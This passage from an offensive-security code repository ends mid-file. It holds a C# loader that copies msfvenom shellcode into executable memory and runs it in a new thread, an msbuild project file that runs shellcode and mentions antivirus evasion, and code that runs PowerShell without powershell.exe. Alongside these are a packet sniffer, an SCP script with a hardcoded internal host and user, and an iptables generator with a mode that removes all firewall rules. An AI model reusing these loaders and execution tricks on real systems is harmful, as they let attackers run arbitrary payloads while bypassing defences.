48 | 	}
49 | }else{ 
50 | 	say "$serv is not an Alcatel 4400\n";
51 | 	exit;
52 | }
53 | 
54 | sub usage{
55 | 	die("\n[*] Usage: $0 -s <server>\n\n");
56 | 	exit(0);
57 | }
58 | 


--------------------------------------------------------------------------------
/Powershell_Without_Powershell.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Linq;
 4 | using System.Text;
 5 | using System.Management.Automation;
 6 | using System.Collections.ObjectModel;
 7 | 
 8 | public class Program
 9 | {
10 |     public static void Main()
11 |     {
12 |         PowerShell ps1 = PowerShell.Create();
13 |         ps1.AddScript("Start-Process calc.exe");
14 |         ps1.Invoke();
15 | 
16 |         PowerShell ps2 = PowerShell.Create();
17 |         ps2.AddCommand("Get-Process");
18 |         Collection<PSObject> PSOutput = ps2.Invoke();
19 |         foreach (PSObject outputItem in PSOutput)
20 |         {
21 |             if (outputItem != null)
22 |             {
23 |                 Console.WriteLine(outputItem);
24 |             }
25 |         }
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Sources
2 | =======
3 | 
4 | Repository that contains random but (sometimes) useful source codes for offensive security stuff.
5 | 


--------------------------------------------------------------------------------
/RequestViewer.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | 
 3 | use 5.010;
 4 | use strict;
 5 | use warnings;
 6 | use Net::Tshark;
 7 | use Term::ANSIColor;
 8 | 
 9 | while(1){
10 | 	# Start the capture process, looking for packets containing HTTP requests and responses
11 | 	my $tshark = Net::Tshark->new or die "Could not start TShark";
12 | 	$tshark->start(interface => 1, display_filter => 'http', promiscuous => 1);
13 | 
14 | 	# Do some stuff that would trigger HTTP requests/responses for 30 s
15 | 	print "\t\t\nCapturing HTTP packets for 10 seconds.";
16 | 	for (1 .. 10){
17 | 		print '.';
18 | 		$| = 1;
19 | 		sleep 1;
20 | 	}
21 | 	say "done.\n";
22 | 
23 | 	# Get any packets captured
24 | 	say colored "Stopping capture and reading packet data...",'green';
25 | 	$| = 1;
26 | 	$tshark->stop;
27 | 	my @packets = $tshark->get_packets;
28 | 
29 | 	# Output a report of what was captured
30 | 	say "Captured ".(@packets)." HTTP packets:";
31 | 
32 | 	# Extract packet information by accessing each packet like a nested hash
33 | 	foreach my $packet (@packets) {
34 | 		
35 | 		my $src_ip = $packet->{ip}->{src};
36 | 		my $dst_ip = $packet->{ip}->{dst};
37 | 		
38 | 		if ($packet->{http}->{request}){
39 | 			
40 | 			my $host = $packet->{http}->{host};
41 | 			my $method = $packet->{http}->{'http.request.method'};
42 | 			#my $usera = $packet->{http}->{'http.request.method'};
43 | 			
44 | 			print colored "\t - HTTP $method request to $host ",'bold green';
45 | 			say colored" src: $src_ip -> dst: $dst_ip",'bold yellow';
46 | 		}
47 | 		else{
48 | 			
49 | 			my $code = $packet->{http}->{'http.response.code'};
50 | 			print colored "\t - HTTP response: $code",'bold yellow';
51 | 			say colored " src: $src_ip -> dst: $dst_ip",'bold green';
52 | 		}
53 | 	}
54 | }
55 | 


--------------------------------------------------------------------------------
/SCP.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl -U
 2 | 
 3 | use 5.010;
 4 | use IO::File;
 5 | use warnings;
 6 | use Data::Dumper;
 7 | use Net::OpenSSH;
 8 | use strict 'vars';
 9 | use Term::ANSIColor;    
10 | 
11 | BEGIN:
12 | 
13 | my $Pass;
14 | my @File =("signatures.cgi" , "Launcher.pl");
15 | my $Path="/var/www/html/";
16 | 
17 | # Using password:
18 | my $PasswdFile = IO::File->new("passwd.txt",'r') || die $!;
19 | 
20 | foreach my $File(@File){
21 | 	
22 | 	print "\nUpdating $Path with $File file ...";
23 | 	while (my $Reading = $PasswdFile->getline()) {
24 | 		chomp($Reading);
25 | 		$Pass=$Reading;
26 | 	}
27 | 			
28 | 			    
29 | 	my $ssh = Net::OpenSSH->new(
30 | 		'10.29.20.2',
31 | 		 user => 'kmkz',
32 | 		 password => $Pass,
33 | 		 strict_mode => 0, 
34 | 		 ctl_dir => "/tmp/.libnet-openssh-perl",
35 | 		 );
36 | 	 
37 | 
38 | 	
39 | 	$ssh->scp_put({glob => 1},$File,$Path )
40 | 		or die colored "scp failed: " . $ssh->error,'bold red';
41 | 	
42 | 	print colored("[OK]\n",'bold green');
43 | }
44 | say "\n[+] Repository is now up to date !\n";
45 | 
46 | 
47 | __END__
48 | 


--------------------------------------------------------------------------------
/Securizer.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl -wU
  2 | 
  3 | use 5.010;
  4 | use threads;
  5 | use Pod::Usage;
  6 | use diagnostics;
  7 | use Getopt::Long;
  8 | use Switch 'Perl6';
  9 | use Term::ANSIColor;
 10 | use English '-no_match_vars';
 11 | 
 12 | use constant TRUE =>(1);
 13 | use constant FALSE =>(0);
 14 | use constant FILTER =>('/proc/sys/net/ipv4/conf/');
 15 | 
 16 | 
 17 | my $result = GetOptions(
 18 | 			'mode|d=s'  => \my $Mode,
 19 | 			);
 20 | 			
 21 | pod2usage(1) if(not defined($Mode));
 22 | warnings()   if($UID ne (FALSE));
 23 | 
 24 | BEGIN:
 25 | 
 26 | my $Compt=TRUE;
 27 | my $IFACE;
 28 | 
 29 | if (-d  FILTER){
 30 |     opendir(FILTER_PATH , FILTER) || printf("[-] Ouverture de %s : Impossible ! \012\012",FILTER);
 31 |     my @filter_path= readdir (FILTER_PATH)|| say colored(" [NO]\n\n",'bold red');;
 32 |     close(FILTER_PATH);                              
 33 |     
 34 |     # On set les flags a "1" de chaques filtres contre le spoofing IP
 35 |     foreach(@filter_path){
 36 |         my @f_p=("/rp_filter");
 37 |         my @rep=(FILTER);
 38 |         
 39 |         next if( -e $_);
 40 |         my $Setting=print`echo 1 > @rep$_@f_p`;
 41 |        
 42 |         print("[*] Configuration du filtre $_ $Compt...........");
 43 |         say colored(" [OK]", 'bold green');
 44 |         $Compt++;
 45 |      }
 46 |      say colored("[+] Configuration des filtres terminee ($Compt)",'bold blue');
 47 | }
 48 | 
 49 | if($Mode !~ /nude/i){
 50 |     print("\n[*] Configuration niveau kernel...",);
 51 |     kernel_settings() || say colored(" [NO]\n\n",'bold red');;
 52 |     
 53 |     say colored(" [OK]\n",'bold green');
 54 |     say colored("[--- Saisir l interface a traiter (wlan0, eth0....) ---]",'yellow');
 55 |     say colored("\r\r[Interface]:",'bold yellow');
 56 |     $IFACE=<STDIN>;
 57 |     chomp($IFACE);
 58 | }
 59 | 
 60 |     
 61 | SWITCH_MODE:
 62 | given ($Mode) {
 63 | 	when(/defensive/i){    
 64 | 	     say colored("\nConfiguration IPTABLES en mode DEFENSIF!",'bold green');
 65 |              iptables_config("defensive","DROP",140);
 66 |         }
 67 | 	when(/offensive/i){     
 68 | 	    say colored("\nConfiguration IPTABLES en mode OFFENSIF",'bold yellow');
 69 | 	    iptables_config("offensive","REJECT",50);
 70 | 	}
 71 | 	when(/nude/i){     
 72 | 	    say colored("\nConfiguration IPTABLES en mode NUDE (dangereux)",'bold blue');
 73 | 	    iptables_flush();
 74 | 	    say colored("\r\r   Firewall stoppe avec succes... open bar !\n ",'yellow');
 75 | 	    exit(TRUE);
 76 | 	}
 77 | 	default{ 
 78 | 	    say colored("\r\r WTF??? ",'bold red');
 79 | 	    exit(FALSE);
 80 | 	}
 81 | }
 82 | 
 83 | 
 84 | my $ReloadService=print(`mv iptables_config.sh /etc/init.d/iptables_config.sh
 85 |                          mv ip6tables_config.sh /etc/init.d/ip6tables_config.sh 
 86 |                          chmod a+x /etc/init.d/iptables_config.sh 
 87 |                          chmod a+x /etc/init.d/ip6tables_config.sh 
 88 |                          /etc/init.d/iptables_config.sh start
 89 |                          /etc/init.d/ip6tables_config.sh start`);
 90 | exit(TRUE);
 91 | 
 92 | 
 93 | 
 94 | #**************************#
 95 | #        Fonctions         #
 96 | #**************************#
 97 | 
 98 | 
 99 | sub warnings{
100 |     warn (" [-] Exiting : $! \012\012\015");
101 |     kill($PID);
102 |     exit(FALSE);
103 |     my $thread1 = threads->new(\&path_cleaner) || $!;
104 | }
105 | 
106 | sub path_cleaner{
107 |     # Vide les variables d'environnement
108 |     delete @ENV {qw  (IFS CDPATH ENV BASH_ENV  )   };  
109 |     return(TRUE);
110 | }
111 | 
112 | sub kernel_settings{
113 |     my $KernelSetting=print(`
114 |                         echo 2 >/proc/sys/kernel/randomize_va_space 
115 |                         echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
116 |                         echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
117 |                         echo 1 > /proc/sys/net/ipv4/conf/all/accept_source_route
118 |                         echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects
119 |                         echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
120 |                         echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
121 |                         `);
122 |     if($Mode =~ /offensive/i){
123 |         
124 |          my $HardKernelSettings=print(`
125 |                                     echo 1 > /proc/sys/net/ipv4/tcp_syncookies
126 |                                     echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
127 |                                     echo 1 > /proc/sys/net/ipv4/conf/default/accept_redirects
128 |                                     echo 1 > /proc/sys/net/ipv4/conf/lo/accept_redirects
129 |          `);
130 |          
131 |     }
132 | 
133 |     my $modules_iptables = threads->new(\&iptables_modules) || $!;
134 |     return(TRUE);
135 | }
136 | 
137 | sub iptables_modules{
138 |     
139 | system<<EOF ;
140 | modprobe ipt_tcpmss
141 | modprobe iptable_nat
142 | modprobe ip_conntrack
143 | modprobe iptable_filter
144 | modprobe iptable_mangle
145 | modprobe ipt_LOG
146 | modprobe ipt_limit
147 | modprobe ipt_state
148 | EOF
149 | 
150 | return(TRUE);
151 | }
152 | 
153 | 
154 | sub iptables_config{
155 | 
156 |     my @ModeValues=@_;
157 |     
158 |     my $Mode =$ModeValues[0]; # mode choisi
159 |     my $Todo =$ModeValues[1]; # DROP / REJECT
160 |     my $Burst=$ModeValues[2]; # Burst-limit  
161 | 
162 |     unless(open(IPTABLES_CONF ,"> iptables_config.sh")){
163 |         warn("[-] $! \012\015");
164 |         exit(FALSE);
165 | }
166 | 
167 | print IPTABLES_CONF <<EOF;
168 | #!/bin/bash -e
169 | 
170 | ### BEGIN INIT INFO
171 | # Provides:          iptables_config : $Mode
172 | # Required-Start:    $IFACE
173 | # Default-Start:     2 3 4 5
174 | # Default-Stop:      0 1 6
175 | # Short-Description: Lightweight network security system
176 | # Description:       Security system that will
177 | #                    analyse traffic from the network cards and will
178 | #                    match against a set of known attacks.
179 | ### END INIT INFO
180 | 
181 | 
182 | iptables -P INPUT ACCEPT
183 | iptables -P OUTPUT ACCEPT
184 | iptables -P FORWARD ACCEPT
185 | iptables -F
186 | 
187 | 
188 | ###############################################################
189 | #    Partie a decommenter si les chaines ont deja ete crees   #
190 | ###############################################################
191 | 
192 | # iptables -X UDP_INPUT
193 | # iptables -X TCP_INPUT
194 | # iptables -X UDP_OUTPUT
195 | # iptables -X TCP_OUTPUT
196 | # iptables -X ICMP
197 | # iptables -X ALLOWED_INPUT
198 | 
199 | # iptables -X SYN_FLOOD
200 | # iptables -X Attacks
201 | # iptables -X FRAG_Attacks
202 | # iptables -X BlackList
203 | 
204 | ###############################################################
205 | #               Creation de nouvelles chaines                 #
206 | ###############################################################
207 |  
208 | iptables -N ALLOWED_INPUT
209 | iptables -N TCP_INPUT
210 | iptables -N UDP_INPUT
211 | iptables -N TCP_OUTPUT
212 | iptables -N UDP_OUTPUT
213 | iptables -N ICMP
214 | 
215 | 
216 | iptables -N Attacks
217 | iptables -N SYN_FLOOD
218 | iptables -N FRAG_Attacks
219 | iptables -N BlackList
220 | 
221 | # Politiques par defaut
222 | iptables -P INPUT DROP
223 | iptables -P OUTPUT DROP
224 | iptables -P FORWARD DROP
225 | 
226 | 
227 | # Autoriser la boucle locale  
228 | iptables -t filter -A INPUT  -p ALL -s 127.0.0.1 -i lo -m state --state ESTABLISHED,NEW,RELATED  -j ACCEPT
229 | iptables -t filter -A OUTPUT -p ALL -d 127.0.0.1 -o lo -m state --state ESTABLISHED,NEW,RELATED  -j ACCEPT
230 | 
231 | ################################
232 | # Trafic autorisé pour le  LAN #
233 | #       si mode routeur        #
234 | ################################
235 | # ID réseau a modifier au besoin (si routeur)
236 | 
237 | ##iptables -t filter -A FORWARD -i $IFACE:1 -s 10.11.12.0/29  -j ACCEPT
238 | ##iptables -t filter -A FORWARD -i $IFACE:1 -d 0.0.0.0/0 -m state --state ESTABLISHED,NEW -j ACCEPT
239 | 
240 | # Envoi des paquets dans leurs chaines de traitements pour les connections entrantes
241 | iptables -A INPUT 		-i $IFACE					-j BlackList
242 | iptables -A INPUT -p ALL 	-i $IFACE -m state --state ESTABLISHED,RELATED 	-j ACCEPT
243 | iptables -A INPUT 		-i $IFACE					-j Attacks
244 | iptables -A INPUT -p TCP 	-i $IFACE 					-j TCP_INPUT
245 | iptables -A INPUT -p UDP 	-i $IFACE 					-j UDP_INPUT
246 | iptables -A INPUT -p ICMP 	-i $IFACE					-j ICMP
247 | 
248 | 
249 | ############################################
250 | # 	DISPATCH DANS LES CHAINES OUTPUT
251 | ############################################
252 | # Envoi des paquets dans leurs chaines de traitements pour les connections sortantes
253 | iptables -A OUTPUT 		-o $IFACE					-j ACCEPT
254 | iptables -A OUTPUT -p ALL 	-o $IFACE -m state --state ESTABLISHED,RELATED 	-j ACCEPT
255 | iptables -A OUTPUT 		-o $IFACE					-j ACCEPT
256 | iptables -A OUTPUT -p TCP 	-o $IFACE 					-j ACCEPT
257 | iptables -A OUTPUT -p UDP 	-o $IFACE					-j ACCEPT 
258 | iptables -A OUTPUT -p ICMP 	-o $IFACE 					-j ACCEPT
259 | 
260 | iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
261 | iptables -A ALLOWED_INPUT -p TCP --syn 			-j ACCEPT
262 | iptables -A ALLOWED_INPUT -p TCP -m state --state ESTABLISHED,RELATED 	-j ACCEPT
263 | iptables -A ALLOWED_INPUT -p UDP 					-j ACCEPT
264 | iptables -A INPUT  -m state --state RELATED,ESTABLISHED                 -j ACCEPT
265 | 
266 | # ouverture de service si besoin ... (HTTP, SSH, DNS)
267 | #iptables -A TCP_INPUT -p TCP -s 0/0 --dport 80  -j ALLOWED_INPUT
268 | #iptables -A TCP_OUTPUT -p TCP --dport 80 	-j ACCEPT
269 | #iptables -A TCP_OUTPUT -p TCP --dport 22 	-j ACCEPT
270 | #iptables -A UDP_OUTPUT -p UDP --dport 53        -j ACCEPT
271 | 
272 | #iptables -A INPUT -s off -j ACCEPT
273 | #iptables -A INPUT -d off -j ACCEPT
274 | 
275 | #####################
276 | # Scans protections #
277 | #####################
278 | 
279 | iptables -N rate_limit
280 | iptables -F rate_limit
281 | iptables -A rate_limit -p tcp  -m limit --limit 3/min --limit-burst 3 -j ACCEPT
282 | iptables -A rate_limit -p udp  -m limit --limit 3/min --limit-burst 3 -j ACCEPT
283 | iptables -A rate_limit -p tcp  -j REJECT --reject-with tcp-reset
284 | iptables -A rate_limit -p udp  -j REJECT --reject-with icmp-port-unreachable
285 | 
286 | # En cas de scan icmp ...
287 | iptables -A rate_limit -p icmp -j $Todo --reject-with icmp-host-unreachable 
288 | 
289 | # Autres
290 | iptables -A rate_limit -j DROP
291 | 
292 | ##################################################
293 | # 	Protection contre attaques de Base       #
294 | ##################################################
295 | 
296 | # Global Attack Call
297 | iptables -A Attacks -j SYN_FLOOD
298 | iptables -A Attacks -j FRAG_Attacks
299 | iptables -A Attacks -j RETURN
300 | 
301 | # Smurf attack / Ping flood
302 | iptables -A INPUT -i $IFACE -p icmp --icmp-type echo-request -m limit --limit 1/second -j ACCEPT
303 | iptables -A INPUT -i $IFACE -p icmp --icmp-type echo-reply   -m limit --limit 1/second -j ACCEPT
304 |  
305 | # Syn Flood
306 | iptables -A SYN_FLOOD -m limit --limit 80/second --limit-burst $Burst -j RETURN
307 | iptables -A SYN_FLOOD -j DROP
308 | 
309 | # Fragment Attacks **** 1.Classics Frag - 2. XMAS - 3. Null Packets
310 | iptables -A FRAG_Attacks -f 				-j $Todo
311 | iptables -A FRAG_Attacks -p tcp --tcp-flags ALL ALL 	-j $Todo   # 1
312 | iptables -A FRAG_Attacks -p tcp --tcp-flags ALL NONE 	-j $Todo   # 2
313 | iptables -A FRAG_Attacks 				-j RETURN # 3
314 | 
315 | # CHAINE LogAndDrop Syn Flood
316 | iptables -N LogAndDropSynFlood 	-j LOG --log-level 4 	--log-prefix '*** SYNFLOOD ATTACK *** '
317 | iptables -N LogAndDropSynFlood 	-j $Todo
318 | 
319 | # CHAINE LogAndDrop Frag Attacks
320 | iptables -N LogAndDropFrag 		-j LOG --log-level 4 	--log-prefix '*** Frag ATTACK *** '
321 | iptables -N LogAndDropFrag 		-j $Todo
322 | 
323 | # CHAINE LogAndDrop XMAS
324 | iptables -N LogAndDropFragMas 		-j LOG --log-level 4 	--log-prefix '*** XMAS ATTACK *** '
325 | iptables -N LogAndDropFragMas 		-j $Todo
326 | 
327 | # CHAINE LogAndDrop Null Packet
328 | iptables -N LogAndDropFragNull 	-j LOG --log-level 4 	--log-prefix '*** NULL ATTACK *** '
329 | iptables -N LogAndDropFragNull 	-j $Todo 
330 | 
331 | EOF
332 | 
333 | print colored("\nConfiguration IPV6 ...",'bold blue');
334 | ip6tables_conf($Mode,$Todo,$Burst) || say colored(" [NO]\n\n",'bold red');
335 | say colored(" [OK]\n\n",'bold green');
336 | 
337 | close(IPTABLES_CONF);
338 | return(TRUE);
339 | }
340 | 
341 | sub iptables_flush{
342 | 
343 |     unless(open(IPTABLES_FLUSH ,"> iptables_flush.sh")){
344 |         warn("[-] $! \012\015");
345 |         exit(FALSE);
346 | }
347 | print`rm /etc/init.d/iptables_config.sh`;
348 | 
349 | print IPTABLES_FLUSH <<EOF;
350 | #!/bin/bash -e
351 | iptables -F
352 | iptables -X
353 | iptables -t nat -F
354 | iptables -t nat -X
355 | iptables -t mangle -F
356 | iptables -t mangle -X
357 | iptables -P INPUT ACCEPT
358 | iptables -P FORWARD ACCEPT
359 | iptables -P OUTPUT ACCEPT
360 | 
361 | # IPV6
362 | ip6tables -F
363 | ip6tables -X
364 | 
365 | EOF
366 | 
367 | my $ReloadService=print(`chmod a+x iptables_flush.sh
368 |                          bash iptables_flush.sh`);
369 | close(IPTABLES_FLUSH);
370 | return(TRUE);
371 | }
372 | 
373 | sub ip6tables_conf{
374 | 
375 |     my @ModeValues=@_;
376 |     
377 |     my $Mode =$ModeValues[0]; # mode choisi
378 |     my $Todo =$ModeValues[1]; # DROP / REJECT
379 |     my $Burst=$ModeValues[2]; # Burst-limit  
380 |     
381 |     unless(open(IP6TABLES_CONF ,"> ip6tables_config.sh")){
382 |         warn("[-] $! \012\015");
383 |         exit(FALSE);
384 | }
385 | 
386 | 
387 | print IP6TABLES_CONF <<EOF;
388 | #!/bin/bash -e
389 | 
390 | ### BEGIN INIT INFO
391 | # Provides:          ip6tables_config : $Mode
392 | # Required-Start:    $IFACE
393 | # Default-Start:     2 3 4 5
394 | # Default-Stop:      0 1 6
395 | # Short-Description: Lightweight network security system
396 | # Description:       Security system that will
397 | #                    analyse traffic from the network cards and will
398 | #                    match against a set of known attacks based on IPV6
399 | ### END INIT INFO
400 | 
401 | # Politique par défaut
402 | ip6tables -P INPUT DROP
403 | ip6tables -P OUTPUT DROP
404 | ip6tables -P FORWARD DROP
405 | 
406 | # Autoriser la boucle locale et l interface (statefull)
407 | ip6tables -A INPUT -t filter -p ALL -s 0/0  -d 0/0 -i lo -m state --state ESTABLISHED,NEW,RELATED  -j ACCEPT
408 | ip6tables -A INPUT -i $IFACE -m state --state ESTABLISHED,RELATED -j ACCEPT
409 | 
410 | # Traitement ICMPV6
411 | ip6tables -A INPUT -i $IFACE -p icmpv6 --icmpv6-type echo-request -j $Todo
412 | 
413 | # DROP en INPUT TCP et UDP (la chaine FORWARD au cas ou ...)
414 | ip6tables -I INPUT -i $IFACE -p tcp --syn -j DROP
415 | ip6tables -I FORWARD -i $IFACE -p tcp --syn -j $Todo 
416 | 
417 | ip6tables -I INPUT -i $IFACE -p udp ! --dport 32768:60999 -j DROP 
418 | ip6tables -I FORWARD -i $IFACE -p udp ! --dport 32768:60999 -j $Todo
419 | 
420 | # Autres
421 | ip6tables -A INPUT -p ALL -i $IFACE -j $Todo --reject-with icmp6-adm-prohibited
422 | 
423 | EOF
424 | 
425 | close(IP6TABLES_CONF);
426 | return(TRUE);
427 | }
428 | 
429 | 	
430 | =info
431 | 
432 | [1] Description:
433 | 
434 | Tool developed for IPTABLES/IP6TABLES configurations generation.
435 | This Version permit to protect you from many network attacks
436 | and / or scans.
437 | 	
438 | 	
439 | [2] Parameters / Options:
440 | 
441 | This tool require only one required parameter.
442 | 
443 | 	-mode: select which mode you want to configure IPTABLES for (not case sensitive)
444 | 	
445 |             .Defensive: configure IPTABLES to be carefull, apply DROP rules on DoS/DDoS, it protect you as well as possible.
446 |             .Offensive: configure IPTABLES to be agressive and apply REJECT rules on DoS/DDoS, so it protect you too ;) 
447 |             .Nude: flush all IPTABLES rules ! 
448 | 	
449 | 		
450 | Note: there is no default value!
451 | 
452 | 		
453 | [3] Example:
454 | 
455 | ./Securize.pl --mode=offensive 
456 | 
457 | 
458 | [4] Securizer todo list:	
459 | 
460 | 	- Build a dynamic configuration (adapted configuration to received packets)
461 | 	- Add "parano" mode 
462 |         - Add an port-knocking functionality
463 | 	- Add others services configurations (SNORT, Fail2ban...)
464 |         - Optimizations ??
465 | 
466 | [5] Contact (to whip me \o/):
467 | 	
468 | 	-Emails:
469 | 		kmkz[at]tuxfamily[dot]org (for fun)
470 | 		mail[dot]bourbon[at]gmail[dot]com
471 | 	
472 | 	-Tweeter: kmkz_security
473 | 	-linkedin:
474 | 		[FR] linkedin.com/pub/jean-marie-bourbon/56/928/469
475 | 		[EN] linkedin.com/pub/jean-marie-bourbon/56/928/469/en
476 | 	-IRC nickname: kmkz
477 | 	
478 | 
479 | =cut
480 | 
481 | __END__
482 | 
483 | 


--------------------------------------------------------------------------------
/Shellc0deLoader.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Runtime.InteropServices;
  3 | //From MicroSoft documentation: 
  4 | //  Most of the P/Invoke API is contained in two namespaces: 
  5 | //  System and System.Runtime.InteropServices.
  6 | 
  7 | // References:
  8 | // https://docs.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke
  9 | // https://posts.specterops.io/offensive-p-invoke-leveraging-the-win32-api-from-managed-code-7eef4fdef16d
 10 | 
 11 | namespace Shellc0deLoader
 12 | {
 13 |     class Program
 14 |     {
 15 |         static void Main(string[] args)
 16 |         {
 17 |             // msfvenom -a x64 -p windows/x64/exec cmd=calc.exe -f csharp -o /tmp/cmd.txt
 18 |             byte[] x64sc = new byte[276] {
 19 |             0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
 20 |             0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
 21 |             0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
 22 |             0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
 23 |             0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
 24 |             0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
 25 |             0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
 26 |             0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
 27 |             0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
 28 |             0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
 29 |             0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
 30 |             0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
 31 |             0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
 32 |             0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
 33 |             0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
 34 |             0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
 35 |             0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
 36 |             0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
 37 |             0x63,0x2e,0x65,0x78,0x65,0x00 };
 38 | 
 39 |             // Instanciate the function as a regular managed method
 40 |             IntPtr funcAddr = VirtualAlloc(
 41 |                               IntPtr.Zero,
 42 |                               (ulong)x64sc.Length,
 43 |                               (uint)StateEnum.MEM_COMMIT,
 44 |                               (uint)Protection.PAGE_EXECUTE_READWRITE);
 45 | 
 46 |             // use Marshal.Copy() to copy our shellcode from managed memory into an unmanaged memory pointer
 47 |             Marshal.Copy(x64sc, 0, (IntPtr)(funcAddr), x64sc.Length);
 48 | 
 49 |             // new threads arguments
 50 |             IntPtr hThread = IntPtr.Zero;
 51 |             uint threadId = 0;
 52 |             IntPtr pinfo = IntPtr.Zero;
 53 | 
 54 |             // Invoke the function as a regular managed method to start anew thead and execute our payload
 55 |             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
 56 |             WaitForSingleObject(hThread, 0xFFFFFFFF);
 57 |             return;
 58 |         }
 59 | 
 60 |         // Preprocessor directive for p/invokes
 61 |         #region pinvokes
 62 | 
 63 |         // Import kernel32.dll (containing the functions we need) 3 times and define the methods corresponding to the native functions.
 64 |         [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
 65 |         private static extern IntPtr VirtualAlloc(
 66 |             IntPtr lpStartAddr,
 67 |             ulong size,
 68 |             uint flAllocationType,
 69 |             uint flProtect);
 70 | 
 71 |         [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
 72 |         private static extern IntPtr CreateThread(
 73 |             uint lpThreadAttributes,
 74 |             uint dwStackSize,
 75 |             IntPtr lpStartAddress,
 76 |             IntPtr param,
 77 |             uint dwCreationFlags,
 78 |             ref uint lpThreadId);
 79 | 
 80 |         [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
 81 |         private static extern uint WaitForSingleObject(
 82 |             IntPtr hHandle,
 83 |             uint dwMilliseconds);
 84 |             
 85 |         // Enum all the things! (twice)
 86 |         public enum StateEnum
 87 |         {
 88 |             MEM_COMMIT = 0x1000,
 89 |             MEM_RESERVE = 0x2000,
 90 |             MEM_FREE = 0x10000
 91 |         }
 92 | 
 93 |         public enum Protection
 94 |         {
 95 |             PAGE_READONLY = 0x02,
 96 |             PAGE_READWRITE = 0x04,
 97 |             PAGE_EXECUTE = 0x10,
 98 |             PAGE_EXECUTE_READ = 0x20,
 99 |             PAGE_EXECUTE_READWRITE = 0x40,
100 |         }
101 |         #endregion
102 |     }
103 | }
104 | 


--------------------------------------------------------------------------------
/Shellcode.csproj:
--------------------------------------------------------------------------------
 1 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 2 | 	
 3 | 	  <!-- Original author: The excellent Casey Smith, Twitter: @subTee -->
 4 | 	  <!-- https://gist.github.com/caseysmithrc/dfb671a8fbe3fa3305cb1ca06c46a010 -->
 5 | 	
 6 |   <!-- This executes shellcode via msbuild.exe (be careful of A.V products) -->
 7 |   <!-- To execute your own shellcode, you first need to generate one using MSFVENOM: -->
 8 |   <!--     msfvenom -p <payload to use>  -e <encoder (optional)>  -f ps1 (could also be done with csharp or powershell) -->
 9 |   <!-- Adapt the XML below with your shellcode and adapt payload's length in buffer allocation-->
10 |   <!-- Execution: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Shellcode.csproj -->
11 | 	
12 |   <!-- Payload generation tool: https://github.com/Mr-Un1k0d3r/PowerLessShell -->
13 | 	
14 |   <Target Name="Shellcode Exec">
15 |     <ClassPayloadExec />
16 |   </Target>
17 |   <UsingTask
18 |     TaskName="ClassPayloadExec"
19 |     TaskFactory="CodeTaskFactory"
20 |     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
21 |     <Task>
22 |       <Code Type="Class" Language="cs">
23 |       <![CDATA[
24 |         using System;
25 |         using System.Runtime.InteropServices;
26 |         using Microsoft.Build.Framework;
27 |         using Microsoft.Build.Utilities;
28 |         public class ClassPayloadExec :  Task, ITask
29 |         {         
30 |           private static UInt32 MEM_COMMIT = 0x1000;          
31 |           private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
32 |           [DllImport("kernel32")]
